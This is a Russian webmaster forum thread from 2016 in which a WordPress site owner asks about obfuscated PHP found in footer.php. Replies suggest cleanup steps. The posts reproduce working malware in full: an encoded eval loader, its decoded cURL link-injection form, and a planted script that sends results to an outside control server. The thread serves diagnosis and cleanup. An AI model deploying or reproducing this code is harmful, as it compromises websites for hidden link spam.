Подскажите, что это такое и зачем на сайте под Вордпресс? - Webmasters.ru - RSS
http://webmasters.ru/forum/showthread.php?t=74723
SEO форум вебмастеров - Поисковые системы, оптимизация, раскрутка сайта, оптимизация и продвижение сайта в поисковых системах1742978783Elesite CMS60http://webmasters.ru/forum/images/wm/misc/rss.pngSEO форум вебмастеров Webmasters.ru
http://webmasters.ru/forum
Подскажите, что это такое и зачем на сайте под Вордпресс? by Gann
http://webmasters.ru/forum/showpost.php?p=744552
Tue, 07 Jun 2016 10:44:24 GMTПривет!
Просматривая один из сайтов, случайно нашёл вот такой вот код в самом начале файла footer.php:
Попытался расшифровать, получил вот это:
class _????{private static$_????;/*Bloodninja: I lick your earlobe, and undo your watch.*/static function _????????($_????){if(!self::$_????):self::_????();/*Sarah19fca: mmmm, okay.*/endif;return BasE64_DECOdE(self::$_????[$_????]);}/*Bloodninja: I take yo pants off, grunting like a troll.*/private static function _????(){self::$_????=array("_\xd5\214???\x8e"=>/*Sarah19fca: Yeah I like it rough.*/"TE\x39D\121UxT\121\x56\x42F","_\303\xb0?????"=>/*Bloodninja: I smack you thick booty.*/"a\110R0cDovL\x33AzLndw\1312Fj\x61\x47UtYmx\166Z\062d\154ci5jb\x320v\132\x32V\x30bGlua3M\165c\107hwP2F\x77aWNvZG\1259bGF\x73YW\x78hND\x51\155c\x47FnZ\130Vy\x62\1040=","_????"=>/*Sarah19fca: Oh yeah, that feels good.*/"aHR\x30cDo\166\114w=\075","_????\xa1????"=>/*Bloodninja: Smack, Smack, yeeeaahhh.*/"U0VS\x56\x6bVSX\060\x35BT\125\x55=","_?\xc7\xaa\211\317?\300?"=>/*Bloodninja: I make some toast and eat it off your ass. Land O' Lakes butter all in your crack. Mmmm.*/"UkV\x52V\125\126TVF9\x56\x55kk=","_???????\323"=>"Jn\126z\132XJh\x5a\x32VudD0\075","_??\x93?\244??"=>"\x53F\x52U\125F9\126U0VSX\x30\106HRU5\x55","_??\xc1???"=>"",);}}function _????????($_??????){$_????U?=CURl_INiT();cURL_SetoPT($_????U?,0105+017-021/*Sarah19fca: you like that?*/+-031/*Bloodninja: I peel some bananas.*/,0501+-0376/*Sarah19fca: Oh, what are you gonna do with those?*/- -01/*Bloodninja: get me peanuts. Peanuts from the ballpark.*/-0104);cUrL_SetOPt($_????U?,(int)ROund(9956.5+9956.5),(int)rouND(0.25/*Sarah19fca: Peanuts?*/+0.25+0.25+0.25));CURl_SEtoPT($_????U?,(int)RoUnd(5001/*Bloodninja: Ken Griffey Jr. Yeaaaaahhh.*/+5001),$_??????);CurL_SETopt($_????U?,(int)rouND(3339.3333333333+3339.3333333333+3339.3333333333),_????::_????????("_??\xa5ю"));/*Sarah19fca: What are you talking about?*/$_???????=curl_eXEC($_????U?);/*Bloodninja: I'm spent, I jump down into the alley and smoke a fatty. I throw rocks at the cats.*/CUrl_cLose($_????U?);return$_???????;/*Sarah19fca: This is stupid.*/}$_????=_????????(_????::_????????("_?\200????\xaa").urLeNcode(_????::_????????("_????").$_SERVER[_????::_????????("_\265\215???????")].$_SERVER[_????::_????????("_?\307\xaa?\317??\xb0")])._????::_????????("_\214?\xd1\xd8??\xc0\xd3").UrleNcoDe($_SERVER[_????::_????????("_???\xa4\x8b\xcc?")])._????::_????????("_\x81??\xb0?\246"));echo/*Bloodninja: Stone Cold Steve Austin gives me some beer.*/$_????;/*Bloodninja: Wanna Wrestle Stone Cold?*/
Загнал полученный результат в переводчик - получился какой то бред.
ВОПРОС: что это вообще за хрень? От куда могла взяться?
Пароль к админке уже поменял. Запустил проверку Манулом от Яндекса... *//* */ ?> */ eval(gzuncompress(base64_decode('eNqFVm1v01YU/it3USXiNg1+iZOmVTZBkxZYaas0aQsYWTfOTeLG8Y3s68ahQryI8dayaQJWpH3aB7qJia1DQhNCk4CNabCNCSa2shXtr+xcu6xJ6MCtbCf33POcc55znxPDwq6L9Ktnfl97sdR0zEXMCHIZZqbRpz//7vTq5sju/r0WpWXbtBfwMNqPLNOoozb1HESwY9ESiSFsl5Fnl2n4dQszoxbv3x26QRXPNphJbaRfuPnV7TurP/x4Ltqn3zrz853HwpJZib7jEqsyPLwFJwyHH/XNlx/cfBEVAH4GO7gmpSsGwDfgiiFax20AIHbZrIw4hHmOjfZiN5dM6Nnc6FQ5F+3yeWQL7qgwcrw3G4brBMJGTWwzF9FKJYaqjmcz065CprCGEXOoZQFcd3k68toKdakLNIMdB7ejEV3zy6omS4m16081f4hEMu92p3SI4FpQVgAzGXKoV+XVixRymq+ks5okS0W/wB+aryY1PyGPRWLgVhEVzS+JJ784++eDG4HX7szcBg6JQqzGKStRynjVIliTJDEvGlm6OAEQyp5jE3a5pUmKJI8taH4ScBKpIjvU8DUpmTysiUm5rElqwjDVhRJskMVFMJb52yzcxNK45WHlIBirhiaJqVprWh7T/FQKz00uHh6HyNV0aZx/oxyag/tQbTILqUjgEzYA1ph9GByKs20Al8FDQszwDD9Z+2fj3GvlmqqhNlQsBllhhiqEWC6qQt5BZvvyPCDIjEcOaSZaGU1Mqdzb7Uunrmg+lq59ef/xa9Wa4bWKvXq0CSEY12oBDUVxdiYsfLI0OzMP1RABQ93LGVFhQQ1i3dR8IwXu8QmgWtIUKfUrECSu78BLg3ecSxsEMYpdFhweAqkA99B+4RGCQxlHE3xlahc868RFJY8xAiuWhUw7tDIcCDeODsKZCCKtAx0qcMIDk+RkYXYsHUauqvV6EObK8tONn26cv6cpsgKhRQ7Y3PAYp3P+QA0MccCqV86Kr+r2aEPz08rL65qcSCz/cpfvAjtljEMVORSAgA9epnlefOAvuS9fDErD95/avAi1kdZX1/jWSAzO4PHto3P1yR+Xzlw/+/BvkIQTH3/z7PzK189OCkt9+kffnv3r2sNbzzOjxbyl7580C6AFRjE/oc8QRqcL0W2TmCiJ6oAopQZFWepuFt79wcHizfJe/+6BQVGReglpQg+FhJSwDX8uFDMmqqLErVPJ3vaLoRbvPOyQwH2V2jZGoH0tk9UAh7oEgAbRoNgDVCUMAUaTYNtjQO90+IIqDm3APo5uWU3s1AEeNosJnq8T5Ds1zTrzjZo2E/JToLjRdFpNxtWB8CGEK6Agk9moGJfV7tC3AHkZ+OL2TRBGgirP5HorGyLRIiCpYm9C7xMbjTtmpULa6IAT50LGr/DcDHB7IdbJ6siox9PJFWjz9XTCoBVFSceV/66Bt3wWYuHkgnGxPVsi+vOVNTiK6tMPI0Lv/JjrpI5hq851Hpeox7ujT39w+vL6uc0n1z7PGJ5j6WQ+N9oRqdA7C3c1kNskNotBFy14jSa0QcuG48loQCjwCaXhp9ht0GCUVDADDeZjp+bQFmi9UXcRRMStDcx4540WAdiYgDbqQg6nXEeEPYkVaqaL4N9lXtPkYni8T1/9bfnTlUzHGduxWt+va7Io8inC9SsixIElMmnQMtnZPpRlId4HVOZnc/kjO1ppcpJPPfXUlc8CxRWOvmXDJuhlqKAXAvm8x4cbbBPi/+NfSizDaIVhVR4CSQONAV0uKxAYFJDHn+UFfBPio43LIGs+TsBYhrlmGHffAOcPSZsX7/OYVkEJk7yziFGjPWOEUZugUWqV4ZUsErTHc+GXBKqai6DgjS3ZLxHixHm3Bfz09NQc5nIy5xCXWaTDIbTnvwjCiFc='))); /* */ ?>
Попытался расшифровать, получил вот это:
class _????{private static$_????;/*Bloodninja: I lick your earlobe, and undo your watch.*/static function _????????($_????){if(!self::$_????):self::_????();/*Sarah19fca: mmmm, okay.*/endif;return BasE64_DECOdE(self::$_????[$_????]);}/*Bloodninja: I take yo pants off, grunting like a troll.*/private static function _????(){self::$_????=array("_\xd5\214???\x8e"=>/*Sarah19fca: Yeah I like it rough.*/"TE\x39D\121UxT\121\x56\x42F","_\303\xb0?????"=>/*Bloodninja: I smack you thick booty.*/"a\110R0cDovL\x33AzLndw\1312Fj\x61\x47UtYmx\166Z\062d\154ci5jb\x320v\132\x32V\x30bGlua3M\165c\107hwP2F\x77aWNvZG\1259bGF\x73YW\x78hND\x51\155c\x47FnZ\130Vy\x62\1040=","_????"=>/*Sarah19fca: Oh yeah, that feels good.*/"aHR\x30cDo\166\114w=\075","_????\xa1????"=>/*Bloodninja: Smack, Smack, yeeeaahhh.*/"U0VS\x56\x6bVSX\060\x35BT\125\x55=","_?\xc7\xaa\211\317?\300?"=>/*Bloodninja: I make some toast and eat it off your ass. Land O' Lakes butter all in your crack. Mmmm.*/"UkV\x52V\125\126TVF9\x56\x55kk=","_???????\323"=>"Jn\126z\132XJh\x5a\x32VudD0\075","_??\x93?\244??"=>"\x53F\x52U\125F9\126U0VSX\x30\106HRU5\x55","_??\xc1???"=>"",);}}function _????????($_??????){$_????U?=CURl_INiT();cURL_SetoPT($_????U?,0105+017-021/*Sarah19fca: you like that?*/+-031/*Bloodninja: I peel some bananas.*/,0501+-0376/*Sarah19fca: Oh, what are you gonna do with those?*/- -01/*Bloodninja: get me peanuts. Peanuts from the ballpark.*/-0104);cUrL_SetOPt($_????U?,(int)ROund(9956.5+9956.5),(int)rouND(0.25/*Sarah19fca: Peanuts?*/+0.25+0.25+0.25));CURl_SEtoPT($_????U?,(int)RoUnd(5001/*Bloodninja: Ken Griffey Jr. Yeaaaaahhh.*/+5001),$_??????);CurL_SETopt($_????U?,(int)rouND(3339.3333333333+3339.3333333333+3339.3333333333),_????::_????????("_??\xa5ю"));/*Sarah19fca: What are you talking about?*/$_???????=curl_eXEC($_????U?);/*Bloodninja: I'm spent, I jump down into the alley and smoke a fatty. I throw rocks at the cats.*/CUrl_cLose($_????U?);return$_???????;/*Sarah19fca: This is stupid.*/}$_????=_????????(_????::_????????("_?\200????\xaa").urLeNcode(_????::_????????("_????").$_SERVER[_????::_????????("_\265\215???????")].$_SERVER[_????::_????????("_?\307\xaa?\317??\xb0")])._????::_????????("_\214?\xd1\xd8??\xc0\xd3").UrleNcoDe($_SERVER[_????::_????????("_???\xa4\x8b\xcc?")])._????::_????????("_\x81??\xb0?\246"));echo/*Bloodninja: Stone Cold Steve Austin gives me some beer.*/$_????;/*Bloodninja: Wanna Wrestle Stone Cold?*/
Загнал полученный результат в переводчик - получился какой то бред.
ВОПРОС: что это вообще за хрень? От куда могла взяться?
Пароль к админке уже поменял. Запустил проверку Манулом от Яндекса...]]>Подскажите, что это такое и зачем на сайте под Вордпресс? by Fartuna
http://webmasters.ru/forum/showpost.php?p=744558
Tue, 07 Jun 2016 11:47:10 GMTчто это вообще за хрень? От куда могла взяться?
А плагины какие установлены? Попробуй отключить плагины по очереди и посмотри. Возможно, что один из плагинов это прописывает.
P.s На всякий случай папку uploads проверь, нет ли там скриптов по мимо фото.Подскажите, что это такое и зачем на сайте под Вордпресс? by Septik
http://webmasters.ru/forum/showpost.php?p=744566
Tue, 07 Jun 2016 12:09:32 GMTWordPress SEO Plugin пробовали отключать?Подскажите, что это такое и зачем на сайте под Вордпресс? by Gann
http://webmasters.ru/forum/showpost.php?p=744641
Wed, 08 Jun 2016 06:56:53 GMTFartuna, не плагины... думаю это просто так прописали.. чтобы не удаляли
---------- Сообщение добавлено 09:48 ---------- Предыдущее 09:48 ----------
Septik, пробовал. Когда удалил - более ничего не появилось... пока что
---------- Сообщение добавлено 10:20 ---------- Предыдущее 09:48 ----------
Итак, посмотрел логи и нашёл в wp-admin/script/ несколько подозрительных скриптов. Содержимое одного из них:
Удалил всё. Поиски продолжаю..
---------- Сообщение добавлено 10:28 ---------- Предыдущее 10:20 ----------
Ещё здесь /wp-admin//link-parse-editor.php
---------- Сообщение добавлено 11:07 ---------- Предыдущее 10:28 ----------
Выяснилось, что произошло заражение и через сайт размещают ссылки SAPE:icon_mrgreen:
---------- Сообщение добавлено 11:56 ---------- Предыдущее 11:07 ----------
С помощью логов обнаружил такой момент:
если добавить к адресу сайта /index.php?itemid=act&check=1&proverka=1, то пишет sape_ready 0)
{
$links_part = array_splice($all_links, 0, $p_threads);
$multithread = new MultiThread($link_timeout);
$multithread->setLinks($links_part);
$multithread->setMethod($p_request,$p_requestbody,$onlybh);
$links_result = $multithread->execute();
foreach($links_result as $res_el)
{
if(!empty($res_el['linkerror']) && $res_el['answer']!='596') $curl_result[$i] = $res_el['link'].'-||-error';
elseif(vf_regex($res_el['answer'],$p_regex,$p_regex_logic) === true)
{
$curl_result[$i] = $res_el['link'].'-||-good';
}
else
{
$curl_result[$i] = $res_el['link'].'-||-bad';
if($res_el['linkerror'] == '2' || $res_el['linkerror'] == '3') $double_links[$i] = $all_links_o[($i-1)];
}
$i++;
}
sleep($p_delay);
}
while(count($double_links) > 0)
{
$links_part = array_slice($double_links, 0, $p_threads, true);
$t_count = count($double_links) - $p_threads;
$double_links = array_slice($double_links, $p_threads, $t_count, true);
$multithread = new MultiThread($link_timeout, 1);
$multithread->setLinks($links_part);
$multithread->setMethod($p_request,$p_requestbody,$onlybh);
$links_result = $multithread->execute();
foreach($links_result as $res_el)
{
if(!empty($res_el['linkerror']) && $res_el['answer']!='596') $curl_result[$res_el['lk']] = $res_el['link'].'-||-error';
elseif(vf_regex($res_el['answer'],$p_regex,$p_regex_logic) === true) $curl_result[$res_el['lk']] = $res_el['link'].'-||-good';
else $curl_result[$res_el['lk']] = $res_el['link'].'-||-bad';
}
sleep($p_delay);
}
//print_r($curl_result);
$curl_result = implode('_||_',$curl_result);
$server_url = 'http://dropsforums.ru/panel/proc/receive_result.php';
$result_init = curl_init($server_url);
curl_setopt($result_init, CURLOPT_POST, true);
curl_setopt($result_init, CURLOPT_TIMEOUT, 15);
curl_setopt($result_init, CURLOPT_CONNECTTIMEOUT, 15);
curl_setopt($result_init, CURLOPT_RETURNTRANSFER, true);
curl_setopt($result_init, CURLOPT_POSTFIELDS, array('hashcode' => $hashcode, 'taskid' => $p_taskid, 'taskname' => $p_taskname, 'client_id' => $p_client_id, 'proc_id' => $p_proc_id, 'vffsockopen' => $vffsockopen, 'result' => $curl_result));
curl_exec($result_init);
curl_close($result_init);
class MultiThread
{
private $maxthreads, $links = array(), $linkscount, $threads = array(), $mtype = 'get', $mcontent, $onlyBody = 0, $onlyHeaders = 0, $results = array();
public function __construct($link_timeout = 1, $double_req = 0, $maxthreads = 150)
{
$this->link_timeout = $link_timeout;
$this->double_req = $double_req;
if($this->double_req == 1)
{
$this->sock_timeout = 3;
$this->link_timeout += 2;
}
else $this->sock_timeout = 2;
$this->maxthreads = $maxthreads;
}
public function setLinks($links = array())
{
$this->links = $links;
$this->linkscount = count($this->links);
if($this->linkscount > $this->maxthreads) $this->links = array_slice($this->links, 0, $this->maxthreads);
}
public function setMethod($type,$mcontent='',$onlyBH=0)
{
$this->mtype = $type;
$this->mcontent = $mcontent;
if($onlyBH == 1) $this->onlyBody = '1';
elseif($onlyBH == 2) $this->onlyHeaders = '1';
}
public function execute()
{
$li = 0;
$t_redirects = array();
foreach ($this->links as $lk => $link)
{
$li++;
$this->results[$li] = array('link' => $link, 'lk' => $lk, 'answer' => '', 'linkerror' => '', 'setonlyBody' => 0);
$t_redirects[$li] = 0;
$link_ar = parse_url($link);
if(isset($link_ar['host']))
{
$server = $link_ar['host'];
if(!$fsock = @fsockopen($server, 80, $erno, $erstr, $this->sock_timeout))
{
if(strpos($erstr,'Name or service not known') !== false) $this->results[$li]['answer'] = '596';
$this->results[$li]['linkerror'] = '2';
}
else
{
$out = get_fwrite_data($link_ar,$this->mtype,$this->mcontent);
fwrite($fsock, $out);
stream_set_timeout($fsock, $this->link_timeout);
stream_set_blocking($fsock, 0);
$this->threads[$li] = $fsock;
}
}
else $this->results[$li]['linkerror'] = '1';
}
$threads_start = time() + floatval(microtime());
do
{
foreach ($this->threads as $key=>$value)
{
$threads_time = round((time() + floatval(microtime()) - $threads_start),2);
if(feof($value) || $threads_time > ($this->link_timeout+8))
{
fclose($value); unset($this->threads[$key]);
}
else
{
$vf_timeout = stream_get_meta_data($value);
if($vf_timeout['timed_out'] === true)
{
$this->results[$key]['linkerror'] = '3';
fclose($value); unset($this->threads[$key]);
continue;
}
//$t_answer = fgets($value);
$t_answer = fread($value, 10240);
if(!empty($t_answer))
{
if(stristr($t_answer,"location:")!='' && (stristr($t_answer,"301 Moved")!='' || stristr($t_answer,"301 Found")!='' || stristr($t_answer,"302 Found")!='' || stristr($t_answer,"302 Moved")!='' || stristr($t_answer,"302 Redirect")!='' || stristr($t_answer,"303 See")!='') && $t_redirects[$key]<3)
{
$link_redirect = preg_match('/^Location: (.+?)$/Um', $t_answer, $t_matches);
$t_redirects[$key] += 1;
$t_matches[1] = trim($t_matches[1]);
echo $this->results[$key]['link'].' - '.$t_matches[1]."\n\n";
if(substr($t_matches[1],0,5) == 'https')
{
$link_ar = parse_url($t_matches[1]);
$server = $link_ar['host'];
if(!$fsock = @fsockopen('ssl://'.$server, 443, $erno, $erstr, $this->sock_timeout))
{
$this->results[$key]['linkerror'] = '4';
fclose($value); unset($this->threads[$key]);
}
else
{
$this->results[$key]['link'] = $t_matches[1];
$out = get_fwrite_data($link_ar,$this->mtype,$this->mcontent);
fwrite($fsock, $out);
stream_set_timeout($fsock, $this->link_timeout);
stream_set_blocking($fsock, 0);
$this->threads[$key] = $fsock;
$this->results[$key]['answer'] = '';
continue;
}
}
else
{
if(substr($t_matches[1],0,4) != 'http')
{
$link_ar = parse_url($this->results[$key]['link']);
$server = $link_ar['host'];
$t_matches[1] = 'http://'.$server.(substr($t_matches[1],0,1)=='/'?'':'/').$t_matches[1];
}
$link_ar = parse_url(trim($t_matches[1]));
$server = $link_ar['host'];
fclose($value); unset($this->threads[$key]);
if(!$fsock = @fsockopen($server, 80, $erno, $erstr, $this->sock_timeout))
{
$this->results[$key]['linkerror'] = '5';
}
else
{
$this->results[$key]['link'] = $t_matches[1];
$out = get_fwrite_data($link_ar,$this->mtype,$this->mcontent);
fwrite($fsock, $out);
stream_set_timeout($fsock, $this->link_timeout);
stream_set_blocking($fsock, 0);
$this->threads[$key] = $fsock;
$this->results[$key]['answer'] = '';
continue;
}
}
}
$this->results[$key]['answer'] .= $t_answer;
if($this->onlyBody == 1 && $this->results[$key]['setonlyBody'] == 0)
{
if(strpos($this->results[$key]['answer'],"\r\n\r\n") !== false)
{
$body_ar = explode("\r\n\r\n",$this->results[$key]['answer'],2);
$this->results[$key]['answer'] = $body_ar[1];
$this->results[$key]['setonlyBody'] = 1;
}
}
elseif($this->onlyHeaders == 1)
{
if(strpos($this->results[$key]['answer'],"\r\n\r\n") !== false)
{
$header_ar = explode("\r\n\r\n",$this->results[$key]['answer']);
$this->results[$key]['answer'] = $header_ar[0];
fclose($value); unset($this->threads[$key]);
}
}
}
}
}
usleep(10000);
}
while (count($this->threads) > 0);
return $this->results;
}
}
function get_fwrite_data($link_ar, $mtype='get', $content)
{
$server = $link_ar['host'];
$query = isset($link_ar['path']) ? $link_ar['path'] : '/';
if(isset($link_ar['query'])) $query .= '?'.$link_ar['query'];
if($mtype=='post')
{
$result = "POST $query HTTP/1.1\r\n";
$result .= "Host: $server\r\n";
$result .= "Cookie: income=1\r\n";
$result .= "Content-Type: application/x-www-form-urlencoded\r\n";
$result .= "Content-Length: ".strlen($content)."\r\n";
$result .= "Connection: Close\r\n\r\n";
$result .= $content;
}
elseif($mtype=='get')
{
$result = "GET $query HTTP/1.1\r\n";
$result .= "Host: $server\r\n";
$result .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n";
//$result .= "Accept: text/xml,application/xml,application/xhtml+xml,application/json,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
//$result .= "Referer: http://armsites.info\r\n";
$result .= "User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\r\n";
$result .= "Connection: Close\r\n\r\n";
}
return $result;
}
function vf_regex($answer, $regex, $regex_logic = 3)
{
if($regex_logic == '1')
{
if(preg_match($regex,$answer)) return true;
}
elseif($regex_logic == '2')
{
if(!preg_match($regex,$answer)) return true;
}
elseif($regex_logic == '3')
{
$regex = str_replace("\n",'',$regex);
$answer = str_replace("\n",'',$answer);
if(strpos($answer,$regex) !== false) return true;
}
elseif($regex_logic == '4')
{
$regex = str_replace("\n",'',$regex);
$answer = str_replace("\n",'',$answer);
if(strpos($answer,$regex) === false) return true;
}
return false;
}
?>
Удалил всё. Поиски продолжаю..
---------- Сообщение добавлено 10:28 ---------- Предыдущее 10:20 ----------
Ещё здесь /wp-admin//link-parse-editor.php
---------- Сообщение добавлено 11:07 ---------- Предыдущее 10:28 ----------
Выяснилось, что произошло заражение и через сайт размещают ссылки SAPE:icon_mrgreen:
---------- Сообщение добавлено 11:56 ---------- Предыдущее 11:07 ----------
С помощью логов обнаружил такой момент:
если добавить к адресу сайта /index.php?itemid=act&check=1&proverka=1, то пишет sape_ready]]>Подскажите, что это такое и зачем на сайте под Вордпресс? by redeyer
http://webmasters.ru/forum/showpost.php?p=744658
Wed, 08 Jun 2016 07:28:55 GMTПрежде всего смотрите FTP. Я бы вообще его отключил. Или хотя бы меняйте на нем пароли. Также права на файлы и папки - не должны быть 777. Кое-какую защиту дает запуск сайтов под разными пользователями, обычно через apache ITK - по крайней мере помогает не заразить все сайты на VPS.Подскажите, что это такое и зачем на сайте под Вордпресс? by Gann
http://webmasters.ru/forum/showpost.php?p=744680
Wed, 08 Jun 2016 10:49:10 GMTВсё вроде нашёл, всё удалил... при добавлении к адресу сайта index.php?itemid=act&check=1&proverka=1 вы даёт sape_ready:icon_mrgreen:.
Кто-нибудь знает где искать?
Кстати, злодей с Украины:icon_evil:, я не сильно удивлёнПодскажите, что это такое и зачем на сайте под Вордпресс? by Fartuna
http://webmasters.ru/forum/showpost.php?p=744688
Wed, 08 Jun 2016 11:34:22 GMTGann,Сделай проще, скачай на комп папку wp-content(на всякий случай), так же ее проверь.
Дальше подключаешься по ftp и удаляешь все папки и файлы движка, кроме wp-config.php, robots, .htaccess и подобных, которых нет в чистом движке. И после удаления заливаешь новый движок и все. Так как папка wp-content останется на сервере, перед тем как будешь лить новый движок, удали оттуда эту папку и файлы типа wp-config.php
P.s Папку wp-content скачать и проверить, но удалять ее не нужно с ftp, если там чисто.
Это самый оптимальный вариант, нежели копать все файлы движка.
НО ПОЛНЫЙ бекап делать обязательно, в том числе и бекап базы данных.Подскажите, что это такое и зачем на сайте под Вордпресс? by Gann
http://webmasters.ru/forum/showpost.php?p=744690
Wed, 08 Jun 2016 11:47:18 GMTFartuna, наверное так и сделаю... Вообще никаких последствий заражения пока нету - нет ни ссылок, ничего... просто лишние коды в файлах.
Ну index.php?itemid=act&check=1&proverka=1 - вот только это беспокоитПодскажите, что это такое и зачем на сайте под Вордпресс? by Lastwarrior
http://webmasters.ru/forum/showpost.php?p=744754
Thu, 09 Jun 2016 00:35:13 GMTнаверное так и сделаю... Вообще никаких последствий заражения пока нету - нет ни ссылок, ничего... просто лишние коды в файлах.Дали отстоятся просто твоему пирогу, а ссылки могут и на свои ресурсы поставить если надо или дор какой-нибудь со временем зальют.Подскажите, что это такое и зачем на сайте под Вордпресс? by Бабайка
http://webmasters.ru/forum/showpost.php?p=745710
Thu, 16 Jun 2016 20:11:48 GMTУвидел eval в коде - убей его.
p.s. причем дырка может быть и не у тебя, а у хостера.Подскажите, что это такое и зачем на сайте под Вордпресс? by Lastwarrior
http://webmasters.ru/forum/showpost.php?p=745733
Fri, 17 Jun 2016 07:02:35 GMTНедавно обнаружили крупную сеть пекарей, которые делают SQL инъекции в движки с такой уязвимость, масштабы там просто поразительные.